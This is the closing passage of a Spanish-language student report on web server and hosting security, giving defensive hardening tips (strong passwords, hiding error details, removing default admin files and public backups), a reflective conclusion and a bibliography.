Usar siempre contraseas seguras:con ms de 10 caracteres que incluyan letras

maysculas, letras

minsculas, smbolos y nmeros.

No crear archivos PHPINFO pblicos, ni instalar phpmyadmin en servidores.

Si se usa Tomcat, borrar los archivos de administracin por defecto.

Crear pginas de error genricoque no entreguen informacin sobre el servidor de

aplicaciones.

Ocultar los errores y excepcionesde las aplicaciones para los diferentes lenguajes de

programacin usados, en su lugar enviarlos siempre a los archivos de Log.

No dejar pblico contenido que no sea estrictamente necesario, por ejemplo dejar

respaldos de sitios, dump de bases de datos, archivos con informacin sensible u otros.


29/30


Pgina 29 de 30

Conclusiones

El mundo va evolucionando. Todos quieren ser algo ms. Haciendo una breve analoga, aumentan en

Chile los hijos que estudian carreras universitarias dentro de los quintiles ms pobres, o donde son

ellos el primer profesional de la familia.

Los sistemas informticos son, en parte, parecidos. No se quedan atrs. Avanzan constantemente.

Debido a esto, no es sorpresa que algunos sistemas vayan quedando obsoletos, o con el pasar de los

das nos encontremos con noticias de algn gran avance tecnolgico.

Pero as como lo bueno evoluciona: lo malo avanza de igual forma.

Siendo una suerte de Ying-Yang de la informtica, las nuevas formas de ataques, los virus, y todo lo

que constituya la explotacin de las vulnerabilidades, van corriendo una carrera a brazo partido con

las formas de evitar, contrarrestar y / o prevenirles, que van surgiendo.

Y esto es lo que hace interesante lo anteriormente planteado.

En uno de los diarios murales del instituto ITC, hay una cita a Bill Gates, en la que afirma que los

virus son formas de vida. Formas de vida que han mantenido en vela a ms de un informtico, por

cierto, pero que son necesarias para este proceso constante de evolucin.

Volviendo al primer prrafo de esta conclusin: debido a que todo va evolucionando, con el pasar del

tiempo, cualquier sistema se convertir en vulnerable. Ergo, debemos estar a la sombra de todo lo

que pueda vulnerar nuestros servidores o nuestras pginas, para hacerle frente. Sobre todo, si

queremos ser informticos, por cierto.

Y en caso de que seamos quienes contratamos un servicio de hosting, siempre ser recomendable

tener un buen servicio, y de esta forma acortar el rango de posibilidades de tener problemas con el

negocio que sostenemos va Internet, por ejemplo.

No en vano, dicen que Juan Segura vivi muchos aos.

Son las humildes palabras de los integrantes del grupo que hizo el presente trabajo.


30/30


Bibliografa:

Wikipedia http://www.wikipedia.org/es

Ordenadores y porttiles http://www.ordenadores-y-portatiles.com/

Proyecto Teleducacin http://www.sipan.inictel.gob.pe/users

InternetLab http://www.internetlab.es

Masadelante.com http://www.masadelante.com

Topbits.com http://www.topbits.com

Gobierno de Chile www.gobiernodechile.cl

Centro de Informtica y Telecomunicaciones de la Fuerza Area de Chile www.fach.cl

Escuela de Telecomunicaciones del Ejrcito de Chile www.esctel.cl/

seguridad en servidores web y hosting

Documents